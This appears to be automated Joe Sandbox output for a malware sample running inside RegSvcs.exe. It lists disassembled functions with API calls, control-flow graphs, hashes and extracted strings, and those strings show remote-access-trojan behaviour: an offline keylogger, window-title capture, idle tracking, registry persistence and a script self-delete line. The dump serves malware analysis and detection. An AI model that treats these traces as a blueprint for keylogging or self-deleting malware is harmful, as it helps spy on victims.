                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                              • API String ID: 994465650-2151626615
                              • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                              • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                              • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                              • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                              Control-flow Graph

                              APIs
                              • __Init_thread_footer.LIBCMT ref: 0040AD38
                              • Sleep.KERNELBASE(000001F4), ref: 0040AD43
                              • GetForegroundWindow.USER32 ref: 0040AD49
                              • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                              • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                              • String ID: [${ User has been idle for $ minutes }$]
                              • API String ID: 911427763-3954389425
                              • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                              • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                              • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                              • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1178 40da34-40da59 call 401f86 1181 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1178->1181 1182 40da5f 1178->1182 1208 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1181->1208 1183 40da70-40da7e call 41b5b4 call 401f13 1182->1183 1184 40da91-40da96 1182->1184 1185 40db51-40db56 1182->1185 1186 40daa5-40daac call 41bfb7 1182->1186 1187 40da66-40da6b 1182->1187 1188 40db58-40db5d 1182->1188 1189 40da9b-40daa0 1182->1189 1190 40db6e 1182->1190 1191 40db5f-40db64 call 43c0cf 1182->1191 1211 40da83 1183->1211 1193 40db73-40db78 call 43c0cf 1184->1193 1185->1193 1203 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1186->1203 1204 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1186->1204 1187->1193 1188->1193 1189->1193 1190->1193 1199 40db69-40db6c 1191->1199 1205 40db79-40db7e call 409057 1193->1205 1199->1190 1199->1205 1203->1211 1217 40da87-40da8c call 401f09 1204->1217 1205->1181 1211->1217 1217->1181
                              APIs
                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 82841172-425784914
                              • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                              • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                              • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                              • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1295 41c3f1-41c402 1296 41c404-41c407 1295->1296 1297 41c41a-41c421 1295->1297 1298 41c410-41c418 1296->1298 1299 41c409-41c40e 1296->1299 1300 41c422-41c43b CreateFileW 1297->1300 1298->1300 1299->1300 1301 41c441-41c446 1300->1301 1302 41c43d-41c43f 1300->1302 1304 41c461-41c472 WriteFile 1301->1304 1305 41c448-41c456 SetFilePointer 1301->1305 1303 41c47f-41c484 1302->1303 1307 41c474 1304->1307 1308 41c476-41c47d FindCloseChangeNotification 1304->1308 1305->1304 1306 41c458-41c45f CloseHandle 1305->1306 1306->1302 1307->1308 1308->1303
                              APIs
                              • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0041C44D
                              • CloseHandle.KERNEL32(00000000), ref: 0041C459
                              • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0041C477
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                              • String ID: hpF
                              • API String ID: 1087594267-151379673
                              • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                              • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                              • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                              • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1309 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1320 41b35d-41b366 1309->1320 1321 41b31c-41b32b call 4135a6 1309->1321 1322 41b368-41b36d 1320->1322 1323 41b36f 1320->1323 1326 41b330-41b347 call 401fab StrToIntA 1321->1326 1325 41b374-41b37f call 40537d 1322->1325 1323->1325 1331 41b355-41b358 call 401fd8 1326->1331 1332 41b349-41b352 call 41cf69 1326->1332 1331->1320 1332->1331
                              APIs
                                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                              • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCurrentOpenProcessQueryValue
                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                              • API String ID: 1866151309-2070987746
                              • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                              • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                              • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                              • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1383 40a675-40a685 1384 40a722-40a725 1383->1384 1385 40a68b-40a68d 1383->1385 1386 40a690-40a6b6 call 401f04 CreateFileW 1385->1386 1389 40a6f6 1386->1389 1390 40a6b8-40a6c6 GetFileSize 1386->1390 1393 40a6f9-40a6fd 1389->1393 1391 40a6c8 1390->1391 1392 40a6ed-40a6f4 FindCloseChangeNotification 1390->1392 1394 40a6d2-40a6d9 1391->1394 1395 40a6ca-40a6d0 1391->1395 1392->1393 1393->1386 1396 40a6ff-40a702 1393->1396 1397 40a6e2-40a6e7 Sleep 1394->1397 1398 40a6db-40a6dd call 40b0dc 1394->1398 1395->1392 1395->1394 1396->1384 1399 40a704-40a70b 1396->1399 1397->1392 1398->1397 1399->1384 1401 40a70d-40a71d call 40905c call 40a179 1399->1401 1401->1384
                              APIs
                              • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                              • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,0040A74D), ref: 0040A6EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$ChangeCloseCreateFindNotificationSizeSleep
                              • String ID: XQG
                              • API String ID: 4068920109-3606453820
                              • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                              • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                              • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                              • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CountEventTick
                              • String ID: !D@$NG
                              • API String ID: 180926312-2721294649
                              • Opcode ID: 6aa289381ca7ffc7839bd185018c03a8b122282be0e3cf198c7b8b30a4e99bb5
                              • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                              • Opcode Fuzzy Hash: 6aa289381ca7ffc7839bd185018c03a8b122282be0e3cf198c7b8b30a4e99bb5
                              • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

                              Control-flow Graph

                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                              • CreateThread.KERNELBASE(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                              • CreateThread.KERNELBASE(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread$LocalTimewsprintf
                              • String ID: Offline Keylogger Started
                              • API String ID: 465354869-4114347211
                              • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                              • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                              • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                              • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                              • RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                              • RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: pth_unenc
                              • API String ID: 1818849710-4028850238
                              • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                              • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                              • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                              • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                              • CreateThread.KERNELBASE(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                              • FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00404DDB
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                              • String ID:
                              • API String ID: 2579639479-0
                              • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                              • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                              • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                              • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                              APIs
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                              • GetLastError.KERNEL32 ref: 0040D083
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateErrorLastMutex
                              • String ID: SG
                              • API String ID: 1925916568-3189917014
                              • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                              • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                              • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                              • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                              • RegCloseKey.KERNELBASE(?), ref: 004135F2
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                              • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                              • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                              • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                              • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                              • RegCloseKey.KERNELBASE(00000000), ref: 00413738
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                              • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                              • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                              • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                              • _free.LIBCMT ref: 0044F41A
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnvironmentStrings$Free_free
                              • String ID:
                              • API String ID: 2716640707-0
                              • Opcode ID: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                              • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                              • Opcode Fuzzy Hash: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                              • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                              • RegCloseKey.KERNELBASE(?), ref: 00413592
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                              • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                              • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                              • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                              • RegCloseKey.KERNELBASE(?,?,?,0040C19C,00466C48), ref: 00413535
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                              • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                              • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                              • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                              • RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                              • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID:
                              • API String ID: 1818849710-0
                              • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                              • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                              • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                              • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wcslen
                              • String ID: pQG
                              • API String ID: 176396367-3769108836
                              • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                              • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                              • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                              • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                              APIs
                              • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B7CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: GlobalMemoryStatus
                              • String ID: @
                              • API String ID: 1890195054-2766056989
                              • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                              • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                              • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                              • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                              APIs
                              • _free.LIBCMT ref: 004461A6
                                • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap$_free
                              • String ID:
                              • API String ID: 1482568997-0
                              • Opcode ID: faad750e247cad17ebccd4cbcbb14699b820db20798bfdb49a30fe1b63b842b1
                              • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                              • Opcode Fuzzy Hash: faad750e247cad17ebccd4cbcbb14699b820db20798bfdb49a30fe1b63b842b1
                              • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                              APIs
                              • socket.WS2_32(?,00000001,00000006), ref: 00404852
                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateEventStartupsocket
                              • String ID:
                              • API String ID: 1953588214-0
                              • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                              • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                              • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                              • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                              • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                              • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                              • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                              APIs
                              • GetForegroundWindow.USER32 ref: 0041BAB8
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Window$ForegroundText
                              • String ID:
                              • API String ID: 29597999-0
                              • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                              • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                              • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                              • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                              APIs
                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                              • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
